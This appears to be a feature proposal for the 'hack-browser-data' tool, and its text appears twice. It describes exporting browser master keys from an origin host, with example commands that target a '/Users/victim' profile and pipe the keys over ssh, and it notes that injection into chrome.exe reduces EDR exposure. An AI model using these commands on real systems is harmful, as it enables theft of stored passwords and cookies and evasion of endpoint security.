Summary
Add a dump-keys subcommand that exports browser master keys (JSON) without decrypting any profile data, plus a --keys flag on dump that consumes those keys in place of deriving them locally.
This decouples master key extraction (must run on the origin host / live session) from data decryption (can run anywhere), enabling offline and cross-host workflows that are currently impossible — see #481, #485.
Proposed CLI
# Extract keys on the origin host, print to stdout (default, no disk artifact)
hack-browser-data dump-keys -b all
# Or write to a file (0600, user-confirmed path)
hack-browser-data dump-keys -b all -o keys.json
# Decrypt on an analysis host, consume keys from stdin or file, pair with -p
hack-browser-data dump --keys - -p /mnt/image/Users/victim -b chrome
hack-browser-data dump --keys keys.json -p /path/to/copied/profile
# End-to-end pipe — nothing touches disk
ssh origin-host hack-browser-data dump-keys -b chrome | \
hack-browser-data dump --keys - -p /mnt/image/...
Output format (draft)
{
"version": 1,
"entries": [
{ "browser": "chrome", "profile": "Default", "scheme": "v10", "key_b64": "..." },
{ "browser": "chrome", "profile": "Default", "scheme": "v20", "key_b64": "..." }
]
}scheme covers: v10 / v11 / v20 (Chromium Windows), chromium-darwin, chromium-linux, firefox, etc.
Notes
- Default output is stdout; file output is opt-in via
-o.
- All logs must go to stderr so stdout stays a clean data channel.
- Warn on stderr when stdout is a TTY (avoid leaving keys in terminal scrollback).
- Chrome v20 bonus: reflective injection into
chrome.exe runs once on the origin host; offline decrypts no longer re-trigger ABE (lower EDR surface).
Related
Summary
Add a
dump-keyssubcommand that exports browser master keys (JSON) without decrypting any profile data, plus a--keysflag ondumpthat consumes those keys in place of deriving them locally.This decouples master key extraction (must run on the origin host / live session) from data decryption (can run anywhere), enabling offline and cross-host workflows that are currently impossible — see #481, #485.
Proposed CLI
Output format (draft)
{ "version": 1, "entries": [ { "browser": "chrome", "profile": "Default", "scheme": "v10", "key_b64": "..." }, { "browser": "chrome", "profile": "Default", "scheme": "v20", "key_b64": "..." } ] }schemecovers:v10/v11/v20(Chromium Windows),chromium-darwin,chromium-linux,firefox, etc.Notes
-o.chrome.exeruns once on the origin host; offline decrypts no longer re-trigger ABE (lower EDR surface).Related
--profile-dir-pathoptions